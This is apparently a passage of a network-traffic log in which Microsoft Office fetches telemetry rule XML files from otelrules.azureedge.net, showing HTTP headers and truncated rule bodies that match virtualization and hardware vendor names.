                                x-azure-ref: 20241203T165137Z-174f7845968vqt9xhC1EWRgten000000166g00000000mhz2
                                x-fd-int-roxy-purgeid: 0
                                X-Cache: TCP_HIT
                                Accept-Ranges: bytes
                                2024-12-03 16:51:37 UTC | 427 | IN
                                Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120663" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120661" /> <SR T="2" R="([Pp][Aa][Rr][Aa][Ll][Ll][Ee][Ll][Ss])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W"


                                Session ID | Source IP | Source Port | Destination IP | Destination Port
                                64 | 192.168.2.5 | 50031 | 13.107.246.63 | 443
                                Timestamp | Bytes transferred | Direction | Data
                                2024-12-03 16:51:37 UTC | 192 | OUT | GET /rules/rule120664v0s19.xml HTTP/1.1
                                Connection: Keep-Alive
                                Accept-Encoding: gzip
                                User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                Host: otelrules.azureedge.net
                                2024-12-03 16:51:37 UTC | 470 | IN | HTTP/1.1 200 OK
                                Date: Tue, 03 Dec 2024 16:51:37 GMT
                                Content-Type: text/xml
                                Content-Length: 502
                                Connection: close
                                Cache-Control: public, max-age=604800, immutable
                                Last-Modified: Tue, 09 Apr 2024 00:26:35 GMT
                                ETag: "0x8DC582BB6A0D312"
                                x-ms-request-id: 4680a0b7-201e-003c-6bc7-4330f9000000
                                x-ms-version: 2018-03-28
                                x-azure-ref: 20241203T165137Z-174f78459685m244hC1EWRgp2c000000164g000000001zaa
                                x-fd-int-roxy-purgeid: 0
                                X-Cache: TCP_HIT
                                Accept-Ranges: bytes
                                2024-12-03 16:51:37 UTC | 502 | IN
                                Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120664" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120663" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                Session ID | Source IP | Source Port | Destination IP | Destination Port
                                65 | 192.168.2.5 | 50033 | 13.107.246.63 | 443
                                Timestamp | Bytes transferred | Direction | Data
                                2024-12-03 16:51:38 UTC | 192 | OUT | GET /rules/rule120665v0s19.xml HTTP/1.1
                                Connection: Keep-Alive
                                Accept-Encoding: gzip
                                User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                Host: otelrules.azureedge.net
                                2024-12-03 16:51:39 UTC | 470 | IN | HTTP/1.1 200 OK
                                Date: Tue, 03 Dec 2024 16:51:38 GMT
                                Content-Type: text/xml
                                Content-Length: 407
                                Connection: close
                                Cache-Control: public, max-age=604800, immutable
                                Last-Modified: Tue, 09 Apr 2024 00:25:52 GMT
                                ETag: "0x8DC582B9D30478D"
                                x-ms-request-id: b6cdcd34-001e-0014-02c7-435151000000
                                x-ms-version: 2018-03-28
                                x-azure-ref: 20241203T165138Z-174f7845968xr5c2hC1EWRd0hn0000000r30000000009qd3
                                x-fd-int-roxy-purgeid: 0
                                X-Cache: TCP_HIT
                                Accept-Ranges: bytes
                                2024-12-03 16:51:39 UTC | 407 | IN
                                Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120665" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120663" /> <SR T="2" R="([Pp][Ss][Ss][Cc])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O="true">


                                Session ID | Source IP | Source Port | Destination IP | Destination Port
                                66 | 192.168.2.5 | 50034 | 13.107.246.63 | 443
                                Timestamp | Bytes transferred | Direction | Data
                                2024-12-03 16:51:39 UTC | 192 | OUT | GET /rules/rule120666v0s19.xml HTTP/1.1
                                Connection: Keep-Alive
                                Accept-Encoding: gzip
                                User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                Host: otelrules.azureedge.net
                                2024-12-03 16:51:39 UTC | 470 | IN | HTTP/1.1 200 OK
                                Date: Tue, 03 Dec 2024 16:51:39 GMT
                                Content-Type: text/xml
                                Content-Length: 474
                                Connection: close
                                Cache-Control: public, max-age=604800, immutable
                                Last-Modified: Tue, 09 Apr 2024 00:26:30 GMT
                                ETag: "0x8DC582BB3F48DAE"
                                x-ms-request-id: 1fbe2e95-401e-0083-4bb4-43075c000000
                                x-ms-version: 2018-03-28
                                x-azure-ref: 20241203T165139Z-174f7845968xlwnmhC1EWR0sv80000001640000000003mp1
                                x-fd-int-roxy-purgeid: 0
                                X-Cache: TCP_HIT
                                Accept-Ranges: bytes
                                2024-12-03 16:51:39 UTC | 474 | IN
                                Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120666" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120665" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                Session ID | Source IP | Source Port | Destination IP | Destination Port
                                67 | 192.168.2.5 | 50035 | 13.107.246.63 | 443
                                Timestamp | Bytes transferred | Direction | Data
                                2024-12-03 16:51:39 UTC | 192 | OUT | GET /rules/rule120667v0s19.xml HTTP/1.1
                                Connection: Keep-Alive
                                Accept-Encoding: gzip
                                User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                Host: otelrules.azureedge.net
                                2024-12-03 16:51:39 UTC | 470 | IN | HTTP/1.1 200 OK
                                Date: Tue, 03 Dec 2024 16:51:39 GMT
                                Content-Type: text/xml
                                Content-Length: 408
                                Connection: close
                                Cache-Control: public, max-age=604800, immutable
                                Last-Modified: Tue, 09 Apr 2024 00:26:40 GMT
                                ETag: "0x8DC582BB9B6040B"
                                x-ms-request-id: b692b84a-501e-000a-1113-450180000000
                                x-ms-version: 2018-03-28
                                x-azure-ref: 20241203T165139Z-174f7845968n2hr8hC1EWR9cag00000015s000000000u1m8
                                x-fd-int-roxy-purgeid: 0
                                X-Cache: TCP_HIT
                                Accept-Ranges: bytes
                                2024-12-03 16:51:39 UTC | 408 | IN
                                Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120667" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120665" /> <SR T="2" R="^([Qq][Ee][Mm][Uu])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O="true">


                                Session ID | Source IP | Source Port | Destination IP | Destination Port
                                68 | 192.168.2.5 | 50036 | 13.107.246.63 | 443
                                Timestamp | Bytes transferred | Direction | Data
                                2024-12-03 16:51:40 UTC | 192 | OUT | GET /rules/rule120668v0s19.xml HTTP/1.1
                                Connection: Keep-Alive
                                Accept-Encoding: gzip
                                User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                Host: otelrules.azureedge.net
                                2024-12-03 16:51:40 UTC | 470 | IN | HTTP/1.1 200 OK
                                Date: Tue, 03 Dec 2024 16:51:40 GMT
                                Content-Type: text/xml
                                Content-Length: 469
                                Connection: close
                                Cache-Control: public, max-age=604800, immutable
                                Last-Modified: Tue, 09 Apr 2024 00:26:30 GMT
                                ETag: "0x8DC582BB3CAEBB8"
                                x-ms-request-id: 29785dea-d01e-008e-30ff-44387a000000
                                x-ms-version: 2018-03-28
                                x-azure-ref: 20241203T165140Z-174f7845968qj8jrhC1EWRh41s000000161000000000xuhg
                                x-fd-int-roxy-purgeid: 0
                                X-Cache: TCP_HIT
                                Accept-Ranges: bytes
                                2024-12-03 16:51:40 UTC | 469 | IN
                                Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120668" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120667" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                Session ID | Source IP | Source Port | Destination IP | Destination Port
                                69 | 192.168.2.5 | 50037 | 13.107.246.63 | 443
                                Timestamp | Bytes transferred | Direction | Data
                                2024-12-03 16:51:40 UTC | 192 | OUT | GET /rules/rule120669v0s19.xml HTTP/1.1
                                Connection: Keep-Alive
                                Accept-Encoding: gzip
                                User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                Host: otelrules.azureedge.net
                                2024-12-03 16:51:40 UTC | 470 | IN | HTTP/1.1 200 OK
                                Date: Tue, 03 Dec 2024 16:51:40 GMT
                                Content-Type: text/xml
                                Content-Length: 416
                                Connection: close
                                Cache-Control: public, max-age=604800, immutable
                                Last-Modified: Tue, 09 Apr 2024 00:26:32 GMT
                                ETag: "0x8DC582BB5284CCE"
                                x-ms-request-id: 6176e2ed-001e-0079-20ee-4412e8000000
                                x-ms-version: 2018-03-28
                                x-azure-ref: 20241203T165140Z-174f78459685m244hC1EWRgp2c000000162000000000bqau
                                x-fd-int-roxy-purgeid: 0
                                X-Cache: TCP_HIT
                                Accept-Ranges: bytes
                                2024-12-03 16:51:40 UTC | 416 | IN
                                Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120669" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120667" /> <SR T="2" R="([Rr][Ee][Dd] [Hh][Aa][Tt])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O="tr


                                Session ID | Source IP | Source Port | Destination IP | Destination Port
                                70 | 192.168.2.5 | 50038 | 13.107.246.63 | 443
                                Timestamp | Bytes transferred | Direction | Data
                                2024-12-03 16:51:41 UTC | 192 | OUT | GET /rules/rule120670v0s19.xml HTTP/1.1
                                Connection: Keep-Alive
                                Accept-Encoding: gzip
                                User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                Host: otelrules.azureedge.net
                                2024-12-03 16:51:42 UTC | 470 | IN | HTTP/1.1 200 OK
                                Date: Tue, 03 Dec 2024 16:51:42 GMT
                                Content-Type: text/xml
                                Content-Length: 472
                                Connection: close
                                Cache-Control: public, max-age=604800, immutable
                                Last-Modified: Tue, 09 Apr 2024 00:25:33 GMT
                                ETag: "0x8DC582B91EAD002"
                                x-ms-request-id: 248bfb43-401e-002a-2a6a-40c62e000000
                                x-ms-version: 2018-03-28
                                x-azure-ref: 20241203T165142Z-174f7845968kvnqxhC1EWRmf3g0000000szg00000000ge1a
                                x-fd-int-roxy-purgeid: 0
                                X-Cache: TCP_HIT
                                Accept-Ranges: bytes
                                2024-12-03 16:51:42 UTC | 472 | IN
                                Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120670" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120669" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                Session ID | Source IP | Source Port | Destination IP | Destination Port
                                71 | 192.168.2.5 | 50039 | 13.107.246.63 | 443
                                Timestamp | Bytes transferred | Direction | Data
                                2024-12-03 16:51:42 UTC | 192 | OUT | GET /rules/rule120671v0s19.xml HTTP/1.1
                                Connection: Keep-Alive
                                Accept-Encoding: gzip
                                User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                Host: otelrules.azureedge.net
                                2024-12-03 16:51:42 UTC | 470 | IN | HTTP/1.1 200 OK
                                Date: Tue, 03 Dec 2024 16:51:42 GMT
                                Content-Type: text/xml
                                Content-Length: 432
                                Connection: close
                                Cache-Control: public, max-age=604800, immutable
                                Last-Modified: Tue, 09 Apr 2024 00:26:15 GMT
                                ETag: "0x8DC582BAABA2A10"
                                x-ms-request-id: 657660fb-a01e-00ab-52ac-439106000000
                                x-ms-version: 2018-03-28
                                x-azure-ref: 20241203T165142Z-174f7845968cdxdrhC1EWRg0en000000167g000000004y9s
                                x-fd-int-roxy-purgeid: 0
                                X-Cache: TCP_HIT
                                Accept-Ranges: bytes
                                2024-12-03 16:51:42 UTC | 432 | IN | Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120671" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120669" /> <SR T="2" R="^([Ss][Uu][Pp][Ee][Rr][Mm][Ii][Cc][Rr][Oo])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T


                                Session ID | Source IP | Source Port | Destination IP | Destination Port
                                72 | 192.168.2.5 | 50040 | 13.107.246.63 | 443
                                Timestamp | Bytes transferred | Direction | Data
                                2024-12-03 16:51:42 UTC | 192 | OUT | GET /rules/rule120672v0s19.xml HTTP/1.1
                                Connection: Keep-Alive
                                Accept-Encoding: gzip
                                User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                Host: otelrules.azureedge.net
                                2024-12-03 16:51:43 UTC | 470 | IN | HTTP/1.1 200 OK
                                Date: Tue, 03 Dec 2024 16:51:43 GMT
                                Content-Type: text/xml
                                Content-Length: 475
                                Connection: close
                                Cache-Control: public, max-age=604800, immutable
                                Last-Modified: Tue, 09 Apr 2024 00:26:41 GMT
                                ETag: "0x8DC582BBA740822"
                                x-ms-request-id: 0bea3930-701e-0032-170d-41a540000000
                                x-ms-version: 2018-03-28
                                x-azure-ref: 20241203T165143Z-174f7845968pght8hC1EWRyvxg000000098000000000u3x3
                                x-fd-int-roxy-purgeid: 0
                                X-Cache: TCP_HIT
                                Accept-Ranges: bytes
                                2024-12-03 16:51:43 UTC | 475 | IN | Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120672" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120671" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                Session ID | Source IP | Source Port | Destination IP | Destination Port
                                73 | 192.168.2.5 | 50042 | 13.107.246.63 | 443
                                Timestamp | Bytes transferred | Direction | Data
                                2024-12-03 16:51:43 UTC | 192 | OUT | GET /rules/rule120674v0s19.xml HTTP/1.1
                                Connection: Keep-Alive
                                Accept-Encoding: gzip
                                User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                Host: otelrules.azureedge.net
                                2024-12-03 16:51:43 UTC | 470 | IN | HTTP/1.1 200 OK
                                Date: Tue, 03 Dec 2024 16:51:43 GMT
                                Content-Type: text/xml
                                Content-Length: 474
                                Connection: close
                                Cache-Control: public, max-age=604800, immutable
                                Last-Modified: Tue, 09 Apr 2024 00:26:03 GMT
                                ETag: "0x8DC582BA4037B0D"
                                x-ms-request-id: e8c8f6d8-301e-0052-3262-4365d6000000
                                x-ms-version: 2018-03-28
                                x-azure-ref: 20241203T165143Z-174f7845968jrjrxhC1EWRmmrs00000016cg000000007mrn
                                x-fd-int-roxy-purgeid: 0
                                X-Cache: TCP_HIT
                                Accept-Ranges: bytes
                                2024-12-03 16:51:43 UTC | 474 | IN | Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120674" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120673" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                Session ID | Source IP | Source Port | Destination IP | Destination Port
                                74 | 192.168.2.5 | 50041 | 13.107.246.63 | 443
                                Timestamp | Bytes transferred | Direction | Data
                                2024-12-03 16:51:43 UTC | 192 | OUT | GET /rules/rule120673v0s19.xml HTTP/1.1
                                Connection: Keep-Alive
                                Accept-Encoding: gzip
                                User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                Host: otelrules.azureedge.net
                                2024-12-03 16:51:43 UTC | 470 | IN | HTTP/1.1 200 OK
                                Date: Tue, 03 Dec 2024 16:51:43 GMT
                                Content-Type: text/xml
                                Content-Length: 427
                                Connection: close
                                Cache-Control: public, max-age=604800, immutable
                                Last-Modified: Tue, 09 Apr 2024 00:26:31 GMT
                                ETag: "0x8DC582BB464F255"
                                x-ms-request-id: 704560f5-901e-0067-514e-41b5cb000000
                                x-ms-version: 2018-03-28
                                x-azure-ref: 20241203T165143Z-174f7845968xr5c2hC1EWRd0hn0000000r3g00000000741n
                                x-fd-int-roxy-purgeid: 0
                                X-Cache: TCP_HIT
                                Accept-Ranges: bytes
                                2024-12-03 16:51:43 UTC | 427 | IN | Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120673" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120671" /> <SR T="2" R="([Tt][Hh][Ii][Nn][Pp][Uu][Tt][Ee][Rr])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W"


                                Session ID | Source IP | Source Port | Destination IP | Destination Port
                                75 | 192.168.2.5 | 50047 | 13.107.246.63 | 443
                                Timestamp | Bytes transferred | Direction | Data
                                2024-12-03 16:51:45 UTC | 192 | OUT | GET /rules/rule120679v0s19.xml HTTP/1.1
                                Connection: Keep-Alive
                                Accept-Encoding: gzip
                                User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                Host: otelrules.azureedge.net
                                2024-12-03 16:51:46 UTC | 470 | IN | HTTP/1.1 200 OK
                                Date: Tue, 03 Dec 2024 16:51:46 GMT
                                Content-Type: text/xml
                                Content-Length: 174
                                Connection: close
                                Cache-Control: public, max-age=604800, immutable
                                Last-Modified: Tue, 09 Apr 2024 00:25:33 GMT
                                ETag: "0x8DC582B91D80E15"
                                x-ms-request-id: bc2c06a1-701e-005c-2dee-44bb94000000
                                x-ms-version: 2018-03-28
                                x-azure-ref: 20241203T165146Z-174f7845968px8v7hC1EWR08ng00000016d000000000p43d
                                x-fd-int-roxy-purgeid: 0
                                X-Cache: TCP_HIT
                                Accept-Ranges: bytes
                                2024-12-03 16:51:46 UTC | 174 | IN | Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120679" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120677" /> </S> <T> <S T="1" /> </T></R>


                                Session ID | Source IP | Source Port | Destination IP | Destination Port
                                76 | 192.168.2.5 | 50045 | 13.107.246.63 | 443
                                Timestamp | Bytes transferred | Direction | Data
                                2024-12-03 16:51:45 UTC | 192 | OUT | GET /rules/rule120677v0s19.xml HTTP/1.1
                                Connection: Keep-Alive
                                Accept-Encoding: gzip
                                User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                Host: otelrules.azureedge.net
                                2024-12-03 16:51:46 UTC | 470 | IN | HTTP/1.1 200 OK
                                Date: Tue, 03 Dec 2024 16:51:46 GMT
                                Content-Type: text/xml
                                Content-Length: 405
                                Connection: close
                                Cache-Control: public, max-age=604800, immutable
                                Last-Modified: Tue, 09 Apr 2024 00:25:37 GMT
                                ETag: "0x8DC582B942B6AFF"
                                x-ms-request-id: 64c010c7-b01e-003e-2ea1-428e41000000
                                x-ms-version: 2018-03-28
                                x-azure-ref: 20241203T165146Z-174f7845968zgtf6hC1EWRqd8s0000000z2g00000000s41f
                                x-fd-int-roxy-purgeid: 0
                                X-Cache: TCP_HIT
                                Accept-Ranges: bytes
                                2024-12-03 16:51:46 UTC | 405 | IN | Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120677" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120675" /> <SR T="2" R="(^[Xx][Ee][Nn]$)"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O="true"> <


                                Session ID | Source IP | Source Port | Destination IP | Destination Port
                                77 | 192.168.2.5 | 50043 | 13.107.246.63 | 443
                                Timestamp | Bytes transferred | Direction | Data
                                2024-12-03 16:51:45 UTC | 192 | OUT | GET /rules/rule120676v0s19.xml HTTP/1.1
                                Connection: Keep-Alive
                                Accept-Encoding: gzip
                                User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                Host: otelrules.azureedge.net
                                2024-12-03 16:51:46 UTC | 470 | IN | HTTP/1.1 200 OK
                                Date: Tue, 03 Dec 2024 16:51:46 GMT
                                Content-Type: text/xml
                                Content-Length: 472
                                Connection: close
                                Cache-Control: public, max-age=604800, immutable
                                Last-Modified: Tue, 09 Apr 2024 00:25:44 GMT
                                ETag: "0x8DC582B984BF177"
                                x-ms-request-id: 1cfa5ca7-601e-000d-64b2-422618000000
                                x-ms-version: 2018-03-28
                                x-azure-ref: 20241203T165146Z-174f7845968nxc96hC1EWRspw800000015ug00000000up0k
                                x-fd-int-roxy-purgeid: 0
                                X-Cache: TCP_HIT
                                Accept-Ranges: bytes
                                2024-12-03 16:51:46 UTC | 472 | IN | Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120676" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120675" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                Session ID | Source IP | Source Port | Destination IP | Destination Port
                                78 | 192.168.2.5 | 50044 | 13.107.246.63 | 443
                                Timestamp | Bytes transferred | Direction | Data
                                2024-12-03 16:51:45 UTC | 192 | OUT | GET /rules/rule120675v0s19.xml HTTP/1.1
                                Connection: Keep-Alive
                                Accept-Encoding: gzip
                                User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                Host: otelrules.azureedge.net
                                2024-12-03 16:51:46 UTC | 470 | IN | HTTP/1.1 200 OK
                                Date: Tue, 03 Dec 2024 16:51:46 GMT
                                Content-Type: text/xml
                                Content-Length: 419
                                Connection: close
                                Cache-Control: public, max-age=604800, immutable
                                Last-Modified: Tue, 09 Apr 2024 00:26:08 GMT
                                ETag: "0x8DC582BA6CF78C8"
                                x-ms-request-id: 774b57f8-e01e-001f-60f8-441633000000
                                x-ms-version: 2018-03-28
                                x-azure-ref: 20241203T165146Z-174f7845968cdxdrhC1EWRg0en0000001670000000006hv7
                                x-fd-int-roxy-purgeid: 0
                                X-Cache: TCP_HIT
                                Accept-Ranges: bytes
                                2024-12-03 16:51:46 UTC | 419 | IN | Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120675" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120673" /> <SR T="2" R="([Uu][Pp][Cc][Ll][Oo][Uu][Dd])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O=


                                Session ID | Source IP | Source Port | Destination IP | Destination Port
                                79 | 192.168.2.5 | 50046 | 13.107.246.63 | 443
                                Timestamp | Bytes transferred | Direction | Data
                                2024-12-03 16:51:45 UTC | 192 | OUT | GET /rules/rule120678v0s19.xml HTTP/1.1
                                Connection: Keep-Alive
                                Accept-Encoding: gzip
                                User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                Host: otelrules.azureedge.net
                                2024-12-03 16:51:46 UTC | 470 | IN | HTTP/1.1 200 OK
                                Date: Tue, 03 Dec 2024 16:51:46 GMT
                                Content-Type: text/xml
                                Content-Length: 468
                                Connection: close
                                Cache-Control: public, max-age=604800, immutable
                                Last-Modified: Tue, 09 Apr 2024 00:26:41 GMT
                                ETag: "0x8DC582BBA642BF4"
                                x-ms-request-id: bd78242f-a01e-003d-3eee-4498d7000000
                                x-ms-version: 2018-03-28
                                x-azure-ref: 20241203T165146Z-174f7845968cpnpfhC1EWR3afc00000015w0000000008k2s
                                x-fd-int-roxy-purgeid: 0
                                X-Cache: TCP_HIT
                                Accept-Ranges: bytes
                                2024-12-03 16:51:46 UTC | 468 | IN | Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120678" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120677" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                Session ID | Source IP | Source Port | Destination IP | Destination Port
                                80 | 192.168.2.5 | 50050 | 13.107.246.63 | 443
                                Timestamp | Bytes transferred | Direction | Data
                                2024-12-03 16:51:48 UTC | 193 | OUT | GET /rules/rule120602v10s19.xml HTTP/1.1
                                Connection: Keep-Alive
                                Accept-Encoding: gzip
                                User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                Host: otelrules.azureedge.net
                                2024-12-03 16:51:48 UTC | 494 | IN | HTTP/1.1 200 OK
                                Date: Tue, 03 Dec 2024 16:51:48 GMT
                                Content-Type: text/xml
                                Content-Length: 2592
                                Connection: close
                                Vary: Accept-Encoding
                                Cache-Control: public, max-age=604800, immutable
                                Last-Modified: Tue, 09 Apr 2024 00:26:33 GMT
                                ETag: "0x8DC582BB5B890DB"
                                x-ms-request-id: 205353cd-201e-006e-0bb2-42bbe3000000
                                x-ms-version: 2018-03-28
                                x-azure-ref: 20241203T165148Z-174f7845968jrjrxhC1EWRmmrs00000016ag00000000ex65
                                x-fd-int-roxy-purgeid: 0
                                X-Cache: TCP_HIT
                                Accept-Ranges: bytes
                                2024-12-03 16:51:48 UTC | 2592 | IN | Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120602" V="10" DC="SM" EN="Office.System.SystemHealthMetadataApplicationAndLanguage" ATT="cd836626611c4caaa8fc5b2e728ee81d-3b6d6c45-6377-4bf5-9792-dbf8e1881088-7521" SP="CriticalBusinessImpact" DL="A" DCa=


                                Session ID | Source IP | Source Port | Destination IP | Destination Port
                                81 | 192.168.2.5 | 50051 | 13.107.246.63 | 443
                                Timestamp | Bytes transferred | Direction | Data
                                2024-12-03 16:51:48 UTC | 192 | OUT | GET /rules/rule120601v3s19.xml HTTP/1.1
                                Connection: Keep-Alive
                                Accept-Encoding: gzip
                                User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                Host: otelrules.azureedge.net
                                2024-12-03 16:51:48 UTC | 494 | IN | HTTP/1.1 200 OK
                                Date: Tue, 03 Dec 2024 16:51:48 GMT
                                Content-Type: text/xml
                                Content-Length: 3342
                                Connection: close
                                Vary: Accept-Encoding
                                Cache-Control: public, max-age=604800, immutable
                                Last-Modified: Tue, 09 Apr 2024 00:25:34 GMT
                                ETag: "0x8DC582B927E47E9"
                                x-ms-request-id: 5899b398-501e-007b-7df3-445ba2000000
                                x-ms-version: 2018-03-28
                                x-azure-ref: 20241203T165148Z-174f7845968xr5c2hC1EWRd0hn0000000r40000000005dnf
                                x-fd-int-roxy-purgeid: 0
                                X-Cache: TCP_HIT
                                Accept-Ranges: bytes
                                2024-12-03 16:51:48 UTC | 3342 | IN | Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120601" V="3" DC="SM" EN="Office.System.SystemHealthMetadataOS" ATT="cd836626611c4caaa8fc5b2e728ee81d-3b6d6c45-6377-4bf5-9792-dbf8e1881088-7521" SP="CriticalBusinessImpact" DL="A" DCa="DC" xmlns=""> <RI


                                Session ID | Source IP | Source Port | Destination IP | Destination Port
                                82 | 192.168.2.5 | 50052 | 13.107.246.63 | 443
                                Timestamp | Bytes transferred | Direction | Data
                                2024-12-03 16:51:48 UTC | 192 | OUT | GET /rules/rule120682v0s19.xml HTTP/1.1
                                Connection: Keep-Alive
                                Accept-Encoding: gzip
                                User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                Host: otelrules.azureedge.net
                                2024-12-03 16:51:48 UTC | 470 | IN | HTTP/1.1 200 OK
                                Date: Tue, 03 Dec 2024 16:51:48 GMT
                                Content-Type: text/xml
                                Content-Length: 501
                                Connection: close
                                Cache-Control: public, max-age=604800, immutable
                                Last-Modified: Tue, 09 Apr 2024 00:26:18 GMT
                                ETag: "0x8DC582BACFDAACD"
                                x-ms-request-id: 42ae9f56-701e-0001-1d37-40b110000000
                                x-ms-version: 2018-03-28
                                x-azure-ref: 20241203T165148Z-174f7845968kdththC1EWRzvxn0000000km0000000008ym6
                                x-fd-int-roxy-purgeid: 0
                                X-Cache: TCP_HIT
                                Accept-Ranges: bytes
                                2024-12-03 16:51:48 UTC | 501 | IN | Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120682" V="0" DC="SM" T="Subrule" DCa="PSU" xmlns=""> <S> <A T="1" E="TelemetryStartup" /> <R T="2" R="120100" /> <SS T="3" G="{b1676ac3-7fee-44a9-9a0e-dbb0b496efa5}" /> </S> <C T="


                                Session ID | Source IP | Source Port | Destination IP | Destination Port
                                83 | 192.168.2.5 | 50049 | 13.107.246.63 | 443
                                Timestamp | Bytes transferred | Direction | Data
                                2024-12-03 16:51:48 UTC | 192 | OUT | GET /rules/rule120680v0s19.xml HTTP/1.1
                                Connection: Keep-Alive
                                Accept-Encoding: gzip
                                User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                Host: otelrules.azureedge.net
                                2024-12-03 16:51:48 UTC | 494 | IN | HTTP/1.1 200 OK
                                Date: Tue, 03 Dec 2024 16:51:48 GMT
                                Content-Type: text/xml
                                Content-Length: 1952
                                Connection: close
                                Vary: Accept-Encoding
                                Cache-Control: public, max-age=604800, immutable
                                Last-Modified: Tue, 09 Apr 2024 00:25:39 GMT
                                ETag: "0x8DC582B956B0F3D"
                                x-ms-request-id: fdde7aaa-d01e-0028-2a8c-3f7896000000
                                x-ms-version: 2018-03-28
                                x-azure-ref: 20241203T165148Z-174f7845968kvnqxhC1EWRmf3g0000000sxg00000000radk
                                x-fd-int-roxy-purgeid: 0
                                X-Cache: TCP_HIT
                                Accept-Ranges: bytes
                                2024-12-03 16:51:48 UTC | 1952 | IN | Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120680" V="0" DC="SM" T="Subrule" DCa="PSU" xmlns=""> <S> <SS T="1" G="{b1676ac3-7fee-44a9-9a0e-dbb0b496efa5}" /> <R T="2" R="120682" /> <F T="3"> <O T="LT"> <L>


                                Session ID | Source IP | Source Port | Destination IP | Destination Port
                                84 | 192.168.2.5 | 50048 | 13.107.246.63 | 443
                                Timestamp | Bytes transferred | Direction | Data
                                2024-12-03 16:51:48 UTC | 192 | OUT | GET /rules/rule120681v0s19.xml HTTP/1.1
